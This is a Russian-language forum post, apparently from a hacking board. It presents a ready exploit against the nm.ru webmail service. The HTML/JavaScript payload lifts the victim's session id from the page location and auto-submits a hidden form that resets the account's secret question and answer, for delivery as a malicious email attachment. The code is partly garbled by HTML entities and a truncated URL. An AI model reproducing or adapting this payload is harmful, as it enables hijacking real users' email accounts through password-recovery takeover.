Да это развод, только явно не вас. Есть 2-е формы секретный вопрос и секретный ответ... Есть форма настроек данных и есть поле маил. На все эти формы пароль не требуется
Под почтовый клиент, естественно js может и не пахать(например в бате), поэтому придется крепить html'ку. Это конечно пока толька идеи, но мне кажется что ид-ешник получится вытащить из хистори(так как в почтовом клиенте больше ее вы тащить не откуда). Для особо не верущих этот код:

<html>
<script&gt;
var stroka=location+'#';
var sid=stroka.substr(98,32);

&lt;/script&gt;
&lt;form &nbsp; method=&quot;POST&quot; name=&quot;forma&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;session_id&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;cp_msg&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;__post&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;cp_quest&quot; value=&quot;Ни рыба, ни мясо?и не курица тоже&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;cp_answ&quot; &nbsp;value=&quot;321123&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; method=&quot;POST&quot; value=&quot;Внести изменения&quot;&gt;
&nbsp;&lt;/form&gt;
<script&gt;
forma.action=&quot;http://www4.nm.ru/users/chpass.dhtml...id=&quot;+sid;
forma.session_id.value=sid;
document.forma.submit()
&lt;/script&gt;
&lt;/html&gt;

Этот js меняет лишь секретный вопрос и ответ...
з.ы. Скрипт работает только в прикрепленном файле с именем &quot;Ready exploit for hotmail.ru.html&quot;. Сами понимаите измените имя фаила, изменится локатион. Скрипт работает только вод веб-интерфейсом

Это так сказать тестовая версия За полной обращайтесь в фсб)